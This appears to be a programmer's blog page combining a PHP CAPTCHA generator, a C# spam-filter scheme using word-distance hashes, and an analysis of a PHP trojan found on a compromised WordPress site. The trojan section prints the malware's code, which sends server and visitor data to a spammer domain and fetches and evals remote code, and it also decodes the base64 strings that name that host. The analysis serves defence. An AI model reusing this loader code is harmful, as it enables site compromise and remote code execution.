	public static function gc( $exp ) {
		$sql	= "DELETE FROM firewall WHERE ( created_at < :exp );";
		$param	= array( 'exp' => $exp );
		
		parent::init();
		// Assumes parent::$db is a PDO instance
		$stmt	= parent::$db->prepare( $sql );
		$stmt->execute( $param );
	}
	
	
	private static function filterConfig( &$filter = array() ) {
		$filter['limit']	= isset( $filter['limit'] ) ? $filter['limit'] : 10;
		$filter['page']		= isset( $filter['page'] ) ? $filter['page'] : 1;
		$filter['search']	= isset( $filter['search'] ) ? 
						$filter['search'] : '';
		
		$filter['offset']	= parent::_offset( 
						$filter['page'] , 
						$filter['limit']
					);
	}
}

Rendering a CAPTCHA image in PHP

It’s been a while since I posted anything web or programming related (I honestly don’t even remember the last time) so I thought I’d post an update with something asked in an email by a friend. He was putting together something which I’ve been asked to co-write and we came across the CAPTCHA issue again. We’re thinking of using these in a somewhat different way.

What they don’t tell you about CAPTCHA

They’re, more often than not, completely ineffective. The whole point about trying to prevent bots is only relevant when talking about simple drive-by spammers forum flooding or the like, but for anything more than that, you’re better off finding something else.

What they ARE useful for is to make sure only people who really have something to say end up voicing their opinion. I.E. It’s a think-before-you-speak buffer in many ways. This is especially helpful when you have anonymous posting enabled.

I’ve seen tons of examples of how to generate CAPTCHAs, but many of these (especially for PHP) are depending either on an existing image background or are so unreadable, they are not only bot proof they’re human proof. Worse yet, I’ve seen examples longer than one page of code. And I’m not even talking about session handling.

How someone writes something as simple as a CAPTCHA render in longer than a couple of functions is beyond me. OK, that’s just me being lazy, but to a programmer, laziness is a virtue sometimes.

Here’s another thing they don’t tell you about CAPTCHAs: Anything over 3 characters is useless. If they’ve managed to use OCR to break 3 characters, they’ve got the rest, and your efforts will only frustrate legitimate users. Using 4 characters is a bit excessive, 5 and you’re getting on my nerves. 6 is ridiculous and with any more, chances are, I’d rather not participate in whatever it is you have behind your unreadable gibberish.

Another thing a lot of these CAPTCHAs seem to overlook is the character pool. In some of these things, I’ve seen s that looks like 5, u that looks like v. Don’t even get me started on 0, o, 1, i, and j. Best option in this case is to get rid of these similar looking characters. In fact, you’re better off getting rid of most characters that even remotely have the ability to be confused with another letter. This is why I’m leaving out e as well, since that’s too easily confused with ‘c’ sometimes.

Here’s a sample of a CAPTCHA that hopefully doesn’t suck.

You should at least be able to read the bloody thing.

Here’s the code file that generated it (I didn’t include sessions and stuff, but plenty of examples are available elsewhere) :

<?php

ini_set( "display_errors", true );

// Rudimentary random string generator
function random( $length ) {
	
	$out = '';
	$pool = str_split( '2345689abcdfghkmnpqrstwxyzABCDEFGHKMNPQRSTWXYZ' );
	
	// This doesn't need to be any more complicated
	for($i=0; $i < $length; $i++)
		$out .= $pool[ array_rand( $pool ) ];
	
	return $out;
}

// The business end
function captcha( $txt ) {
	
	// Height of 50 is usually good enough	
 	$sizey = 50;
	
	// Character length
 	$cl = strlen( $txt );
	
	// We'll expand the image with the number of characters
 	$sizex= ( $cl * 19 ) + 10;
	
	// I used monofont, but you can download another font to use
	// Try http://dafont.com (don't pick crazy fonts, a nice monospace will do)
	$font = 'monofont.ttf'; 
	
	// Some initial padding
	$w = floor( $sizex / $cl ) - 13;
	
	$img = imagecreatetruecolor( $sizex, $sizey );
	$bg = imagecolorallocate( $img, 255, 255, 255 );
	imagefilledrectangle( $img, 0, 0, $sizex, $sizey, $bg );
	
	// Random lines
	for( $i=0; $i < ( $sizex * $sizey ) / 250; $i++ ) {
		
		// Select colors in a comfortable range
		$t = imagecolorallocate( $img, rand( 150, 200 ), rand( 150, 200 ), rand( 150, 200 ) );
		imageline($img, 
			mt_rand( 0, $sizex ), 
			mt_rand( 0, $sizey ), 
			mt_rand( 0, $sizex ), 
			mt_rand( 0, $sizey ), $t );
	}
	
	// Insert the text (with random colors and placement)
	// Start at the last character (index $cl - 1), not one past it
	for ( $i = $cl - 1; $i >= 0; $i--) {
		
		$l = substr( $txt, $i, 1 );
		
		// Again, colors in a comfortable range. I was thinking pastels
		$tc = imagecolorallocate( $img, rand( 0, 150 ), rand( 10, 150 ), rand( 10, 150 ) );
		imagettftext( $img, 30, 
			rand( -10, 10 ), 
			$w + ( $i * rand( 18, 19 ) ), 
			rand( 30, 40 ), $tc, $font, $l );
	}
	
	// Move the header up the code page if this is going in as part of a bigger project
	header("Content-type: image/png");
	
	imagepng( $img );
	imagedestroy( $img );
}

// Use the render to store in a session first. Remember to clear it with each attempt (success or failure)
captcha( random( 3 ) );
?>
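
Since the session part was left out above, here is one way it might look. This is only a sketch under a few assumptions: `captchaIssue()` and `captchaVerify()` are hypothetical names, `'captcha'` is an arbitrary session key, and the comparison ignores case (a choice made here, not something the render code requires). The session array is passed in by reference so the helpers can be tried without a live session. `hash_equals()` needs PHP 5.6+ and the type declarations need PHP 7.1+.

```php
<?php
/**
 * Hypothetical helper: remember the code that was just rendered
 */
function captchaIssue( array &$session, string $code ): void {
	$session['captcha'] = strtolower( $code );
}

/**
 * Hypothetical helper: check an answer and clear the stored code
 * whether the attempt succeeded or failed
 */
function captchaVerify( array &$session, string $answer ): bool {
	$expected = isset( $session['captcha'] ) ? $session['captcha'] : '';
	
	// One attempt per rendered image
	unset( $session['captcha'] );
	
	if ( '' === $expected ) {
		return false;
	}
	
	return hash_equals( $expected, strtolower( trim( $answer ) ) );
}
```

In a real page this would probably be called as `captchaIssue( $_SESSION, $code )` after `session_start()` and before the image is rendered, then `captchaVerify( $_SESSION, $answer )` with the submitted form value when the form comes back.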

Better spam filtering

The classic method for spam detection used to be Bayesian filtering, but honestly, filters using it are getting easier and easier to circumvent due to Bayesian poisoning.

And of course, Bayesian poisoning works because computers are stupid.

We’re so used to this stupidity, but when we’re very involved in a project we also tend to forget it. It’s almost like the omnipresent security cameras in cities; we know they’re there, we know they see everything, but after a while we lose our inhibition to publicly pick our noses (or pick our underwear out of our buttcrack) as long as no “real” humans are around. Why? We’re still being watched.

Back to the topic…

Use the stupidity

Fighting computer stupidity… is stupid. It doesn’t make sense to make computers understand what “spam” is in order to stop it, so we need a better way of quantifying a message by either turning it into a number or a simple searchable string.

If computers excel at anything, it’s raw number-crunching, particularly arithmetic. So it makes sense that rolling hashes are the way to go when it comes to turning a message into a basic number or string that can be scanned for commonalities. There are many ways to turn a sentence or paragraph into a rolling hash, but one that particularly caught my eye was the Rabin-Karp algorithm. I read that page a few times, but the words just blurred after a while (probably due to lack of coffee). Although this part did stick out…

A practical application of Rabin–Karp is detecting plagiarism. Given source material, Rabin–Karp can rapidly search through a paper for instances of sentences from the source material, ignoring details such as case and punctuation. Because of the abundance of the sought strings, single-string searching algorithms are impractical.

And that makes sense because words can be written in any number of ways and spammers often use punctuation and other special characters to obfuscate what they’re pushing. They also add extra random text, which makes pure Bayesian filtering a problem.

People don’t read punctuation

We don’t, at least not when the gist of the message is all that matters. Periods, question marks, commas and the like add clarity to language, but for pattern matching they are irrelevant: most spam messages have no need for them as long as the product name gets through.

So let’s start with a function that does the following:

  • Strips punctuation
  • Removes line-breaks and special whitespace characters
  • Strips special characters (@#$%^&/[]{}-_ etc…)
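  • Converts Unicode accented characters into their base characters (á into a etc…)

// Requires: using System; using System.Globalization; using System.Linq; using System.Text;
/// <summary>
/// Helper function replaces punctuation, symbols, whitespace and control
/// characters with spaces, strips accents and lowercases the result
/// </summary>
/// <param name="source">Original raw text</param>
/// <returns>Cleaned text</returns>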
public string RemoveNoise(string source)
{
	if (String.IsNullOrEmpty(source))
		return String.Empty;

	StringBuilder sb = new StringBuilder();

	// Normalize the string and convert accents etc...
	char[] chars = source.Normalize(NormalizationForm.FormD)
		.Where(c => CharUnicodeInfo.GetUnicodeCategory(c)
			!= UnicodeCategory.NonSpacingMark).ToArray();

	// Replace noise characters with a space and keep everything else
	for (int i = 0; i < chars.Length; i++)
	{
		sb.Append(
			(char.IsPunctuation(chars[i]) ||
			char.IsSeparator(chars[i]) ||
			char.IsControl(chars[i]) ||
			char.IsWhiteSpace(chars[i]) ||
			char.IsSymbol(chars[i])) ?
			' ' : chars[i]
			);
	}

	// Lowercase trimmed text
	return sb.ToString()
		.ToLowerInvariant()
		.Trim();
}
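
For anyone who wants to poke at the clean-up step outside .NET, here is a rough Python sketch of the same idea. The name remove_noise and the Unicode category checks are my approximation of the C# char.Is… tests above, not an exact port, so edge cases may differ.

```python
import unicodedata


def remove_noise(source: str) -> str:
    """Strip accents, turn punctuation/symbols/whitespace into spaces, lowercase."""
    if not source:
        return ""

    # NFD splits "á" into "a" plus a combining mark (category Mn), which we drop
    decomposed = unicodedata.normalize("NFD", source)
    kept = (c for c in decomposed if unicodedata.category(c) != "Mn")

    cleaned = []
    for c in kept:
        cat = unicodedata.category(c)
        # P* = punctuation, S* = symbols, Z* = separators, Cc = control characters
        is_noise = cat[0] in "PSZ" or cat == "Cc" or c.isspace()
        cleaned.append(" " if is_noise else c)

    return "".join(cleaned).lower().strip()


print(remove_noise("Ut buy ..viägra.. and *&&ciÅlis!! today").split())
# ['ut', 'buy', 'viagra', 'and', 'cialis', 'today']
```

One thing this makes visible: a ligature such as Æ has no base-plus-accent decomposition, so “viagrÆ” comes out as “viagræ” rather than “viagra”.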

We now need a way to calculate the distance of one word from another. The best method I’ve found so far to do this (and one that works with most languages) is the Damerau-Levenshtein distance algorithm. That Wikipedia article was once again a bit of a blur, but another part stood out to me…

…the original motivation was to measure distance between human misspellings to improve applications such as spell checkers…

So this would be used in those nifty “suggestions” for misspelled words. It sounds and looks awfully complicated, but essentially it calculates the minimum number of steps needed to turn the word “Hello”, for example, into the word “Goodbye” so we can check the distance between each word in a sentence. It makes sense to only get the ones that have the smallest number of steps between words for a spellcheck app, but for our purposes, we just need a consistent number in terms of distance between words.

This is the first step in building our “hash”.

/// <summary>
/// Damerau - Levenshtein distance algorithm
/// </summary>
/// <param name="source">Original text</param>
/// <param name="target">Checking text</param>
/// <param name="limit">Optional maximum distance; anything larger returns int.MaxValue</param>
/// <returns>Match distance between source and target</returns>
public int Distance(string source, string target, int limit = 50)
{
	// Handle null or empty input first; calling Equals on a null string would throw
	if (String.IsNullOrEmpty(source) ||
		String.IsNullOrEmpty(target))
		return (source ?? "").Length + (target ?? "").Length;

	if (source.Equals(target))
		return 0;

	if (source.Length > target.Length)
	{
		var t = source;
		source = target;
		target = t;
	}

	if (target.Contains(source))
		return target.Length - source.Length;

	int sLen = source.Length;
	int tLen = target.Length;

	int[,] d = new int[sLen + 1, tLen + 1];

	// Load the matrix
	for (var i = 0; i <= sLen; i++)
		d[i, 0] = i;

	for (var i = 0; i <= tLen; i++)
		d[0, i] = i;

	for (var i = 1; i <= sLen; i++)
	{
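		// Track the smallest value in this row; starting at the limit
		// would mean the early exit below could never trigger
		var min = int.MaxValue;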

		for (var j = 1; j <= tLen; j++)
		{
			var cost =
				(source[i - 1] == target[j - 1]) ? 0 : 1;

			d[i, j] =
				Math.Min(d[i - 1, j] + 1,
				Math.Min(d[i, j - 1] + 1,
				d[i - 1, j - 1] + cost));

			if (i > 1 &&
				j > 1 &&
				source[i - 1] == target[j - 2] &&
				source[i - 2] == target[j - 1])
				d[i, j] =
					Math.Min(d[i, j], d[i - 2, j - 2] + cost);

			if (d[i, j] < min)
				min = d[i, j];
		}

		if (min > limit)
			return int.MaxValue;
	}

	return (d[sLen, tLen] > limit)? int.MaxValue : d[sLen, tLen];
}

And of course we need to actually build our hash using the above two functions. We first clean the text, then build the hash by appending the distance between each word and its previous neighbor in the sentence.

/// <summary>
/// A simple distance aggregation function checks
/// the distance between each word in a block of text
/// and builds a rudimentary hash
/// </summary>
/// <param name="source">Source text</param>
/// <returns>Hash</returns>
public string RollingHash(string source)
{
	if (string.IsNullOrEmpty(source))
		return String.Empty;

	StringBuilder sb = new StringBuilder();

	string[] data = RemoveNoise(source)
		.Split(new char[] { ' ' },
		StringSplitOptions.RemoveEmptyEntries);

	// Placeholder to check distance with current string
	string previous = "";

	foreach (string current in data)
	{
		sb.Append(Distance(previous, current).ToString());
		previous = current;
	}

	return sb.ToString();
}

How does this work

Let’s take a typical spam sentence :

Buy Viagra and Cialis today

If we use the above RollingHash function on this, we end up with the hash : 36556.
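
To see where each digit comes from, here is a small Python sketch of the distance calculation and the word-by-word loop. It is a simplified stand-in for the C# above, under a few assumptions: it leaves out the limit parameter and the substring shortcut, and it takes words that have already been cleaned. The names distance and rolling_hash are just for this illustration.

```python
def distance(source: str, target: str) -> int:
    """Damerau-Levenshtein distance, restricted to adjacent transpositions."""
    rows, cols = len(source) + 1, len(target) + 1
    d = [[0] * cols for _ in range(rows)]

    # Turning a prefix into an empty string costs one step per character
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j

    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if source[i - 1] == target[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution or match
            )
            # Two neighbouring characters swapped, as in "teh" vs "the"
            if (i > 1 and j > 1
                    and source[i - 1] == target[j - 2]
                    and source[i - 2] == target[j - 1]):
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + cost)

    return d[-1][-1]


def rolling_hash(words):
    """Concatenate the distance between each word and the one before it."""
    previous, parts = "", []
    for current in words:
        parts.append(str(distance(previous, current)))
        previous = current
    return "".join(parts)


print(rolling_hash("buy viagra and cialis today".split()))  # 36556
```

The leading 3 is simply the length of “buy” (nothing comes before it), “buy” to “viagra” shares no letters and costs 6, and so on down the sentence.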

Now let’s throw this a curve ball. We all know how much spammers love to obfuscate their products with nonsense padding and odd characters. Let’s see what one of those messages may look like…

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Búy viagrÆ and Çiâlis today non tincidunt ipsum porta vel.

Turning this into a hash produces the following hash : 5455391194655647755
Notice the block after the “4”, which it has in common with the hash of the original unobfuscated string.

Let’s take another example :

Vestibulum quis massa turpis. Ut buy ..viägra.. and *&&ciÅlis!! today vel laoreet dolor. Integer euismod, lectus a buy {[ViÃgRa@$]]. and***ciálÏS*** TôDaÿ faucibus congue.

After turning the above into a hash, we’re still able to pick out the original hash : 1094652655656667763655687. The two instances of “Buy Viagra and Cialis today” can be inferred even with the ridiculous amount of obfuscation.

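Here’s a side-by-side example that shows the pattern match more clearly, with the shared block set apart by spaces.

  Plain sentence     : 3 6556
  First obfuscation  : 5455391194 6556 47755
  Second obfuscation : 1094652 6556 5666776 3 6556 87

The first number in the hash doesn't match because there's no word before "buy", but the rest do.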

Instead of checking word by word for commonalities with spam text, which is what most Bayesian filters do, it would be more practical to convert the entire block of text into a hash and search that instead. For the discussion forum I’m writing, I’m thinking of creating a hash of each post and storing it in the database along with the text content so filtering would be a lot easier.
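
As a sketch of what that search could look like, here is a Python snippet that looks for a spam signature inside a post. One assumption that differs from the code above: the distances are kept as a list of numbers instead of one concatenated string, because a two-digit distance such as 11 would otherwise be indistinguishable from two 1s. The function name find_signature is made up for this example; the numbers are the per-word distances behind the hashes quoted earlier.

```python
def find_signature(tokens, signature):
    """Return every index where `signature` occurs as a contiguous run in `tokens`."""
    n, m = len(tokens), len(signature)
    return [i for i in range(n - m + 1) if tokens[i:i + m] == signature]


# "viagra and cialis today"; the value for the leading "buy" is dropped
# because it depends on whatever word happens to come before it
spam = [6, 5, 5, 6]

# The first obfuscated message, 5455391194655647755, split per word
post = [5, 4, 5, 5, 3, 9, 11, 9, 4, 6, 5, 5, 6, 4, 7, 7, 5, 5]

print(find_signature(post, spam))  # [9]
```

In a database the same list could be stored as a delimited string next to the post, but that is a design choice I have not settled on.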

Update

I overlooked something in the Rabin-Karp algorithm: it not only treats each word as a hash, it also depends on each hash having good collision resistance. For this to work more effectively, we need something more than just the distance from one word to its neighbor. If we also include the length of each word in the hash along with the distance between them, we get much better collision resistance.

E.g., by changing the StringBuilder Append in RollingHash…

foreach (string current in data)
{
	sb.Append(
		QuickHash(previous, current, Distance(previous, current))
		);

	previous = current;
}

Where QuickHash is as follows…

private static string QuickHash(string c, string s, int d)
{
	return String.Concat(c.Length.ToString(),
		s.Length.ToString(), d.ToString());
}

This not only makes the hash signature of the search text longer, it also makes it less likely to collide.
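
To get a feel for the longer signature, here is a Python sketch of the same concatenation. It reuses the distances from the 36556 example instead of recalculating them, and the helper name signature is only for this illustration.

```python
def quick_hash(previous: str, current: str, dist: int) -> str:
    """Length of the previous word, length of the current word, then the distance."""
    return f"{len(previous)}{len(current)}{dist}"


def signature(words, distances):
    """Join the quick hash of every word with the word before it."""
    previous, parts = "", []
    for word, dist in zip(words, distances):
        parts.append(quick_hash(previous, word, dist))
        previous = word
    return "".join(parts)


words = ["buy", "viagra", "and", "cialis", "today"]
distances = [3, 6, 5, 5, 6]  # the digits of the hash 36556 from earlier

print(signature(words, distances))  # 033366635365656
```

Each word now contributes three values instead of one, so two unrelated phrases need to agree on word lengths as well as distances before their signatures match.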

Hash matching improved

Anatomy of a PHP trojan

A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident of another friend’s website. The backend was compromised with no apparent user involvement which means another site on the same server possibly served as the backdoor or perhaps the server admins didn’t set the permissions correctly.

A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the uploading privileges which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since they had sandboxed access.

Certain WordPress plugins require an inordinate amount of privileges, which is the one big reason to run a site with the minimum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or allow arbitrary writing and uploading privileges when the bare minimum is acceptable.

The following is a file called 189715.php found in the /wp-uploads folder of this website; the same code was found in other areas under different numeric filenames. It was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted :

<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>

<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?" .
	base64_encode($a). "." .
	base64_encode($b) . "." .
	base64_encode($c) . "." .
	base64_encode($d) . "." .
	base64_encode($e) . "." .
	base64_encode($f) . "." .
	base64_encode($g) . "." .
	base64_encode($h) . ".e." .
	base64_encode($i) . "." .
	base64_encode($j);

$f=base64_decode("cGhwc2VhcmNoLmNu");

if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
	md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
	$f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	eval($c);
else{
		$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
};
die(); ?>

Variable $z was basically a querystring intended to send all of the relevant server and environment data gathered in the previously defined variables.

String “cGhwc2VhcmNoLmNu” assigned to the $f variable turned out to be “phpsearch.cn”, this particular spammer’s domain. String “aHR0cDovL2FkczMu” turned out to be subdomain “http://ads3.” meaning this was a domain intended to inject spam and I’m sure the domain itself was expendable. String “aHR0cDovLzcxLg==” was pointing to subdomain “http://71.” while “aHR0cDovLzcu” was subdomain “http://7.”.
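
These values are easy to double-check without running any of the trojan's code, since base64 is only an encoding. A short Python sketch (Python purely because it is handy for this; the variable names are mine):

```python
import base64

# The four encoded strings that appear in the trojan source above
encoded = [
    "cGhwc2VhcmNoLmNu",
    "aHR0cDovL2FkczMu",
    "aHR0cDovLzcxLg==",
    "aHR0cDovLzcu",
]

# Decode to text only; nothing is fetched or executed
decoded = {s: base64.b64decode(s).decode("ascii") for s in encoded}

for source, plain in decoded.items():
    print(source, "->", plain)
```

The same trick works on any suspicious file: decode the string and read it, never eval() it.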

That include block first tries to include a PHP file straight from the remote host, which would execute it locally. If the remote include fails, it falls back to fetching the file with file_get_contents() and running the result through the “eval()” function.

If that fails too, it uses curl to get the file and executes it with “eval()” instead.

The [BASE64 ENCODED STRING] was actually another encoded function :

if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
	$GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
	if(file_exists($GLOBALS['mfsn'])){
			include_once($GLOBALS['mfsn']);
			if(function_exists('gml') && function_exists('dgobh'))
			{ob_start('dgobh');}
		}
}

The [REDACTED ROOT] is of course the WP installation directory on this server, and in this case the compromised plugin was OpenID.

The Auth/OpenID directory was full of junk that was surreptitiously uploaded as well. The content of style.css.php was another massive block of base64 encoded code (which I was unable to decode), and the “mfsn” global held the location of that file so it could be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but since “dgobh” is handed to ob_start() as an output callback, it gets a chance to rewrite every page before it is sent. I can guess that it included everything from more injection code to spam to even drive-by downloads.

After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.

PHP Trojans would often employ base64 encoding and even splitting up the encoded string into multiple sections before decoding and running eval(). This would make it harder to spot and even harder to figure out what the code does exactly, especially in a big file, with just a cursory glance.
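
A crude first pass for finding files like this is to search for the telltale patterns. The Python sketch below is only a heuristic under my own assumptions: the 200-character threshold is arbitrary, the function name looks_suspicious is invented, and a trojan that splits its encoded string into pieces (as described above) would slip past it.

```python
import re

# eval() wrapped directly around base64_decode(), as in the sample above
EVAL_DECODE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

# A very long quoted run of base64 characters; the length is an arbitrary guess
LONG_BASE64 = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")


def looks_suspicious(php_source: str) -> bool:
    """Flag source text that contains either telltale pattern."""
    return bool(EVAL_DECODE.search(php_source) or LONG_BASE64.search(php_source))


sample = "<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>"
print(looks_suspicious(sample))                    # True
print(looks_suspicious("<?php echo 'hello'; ?>"))  # False
```

Anything it flags still needs a human look, since legitimate code sometimes embeds base64 data too.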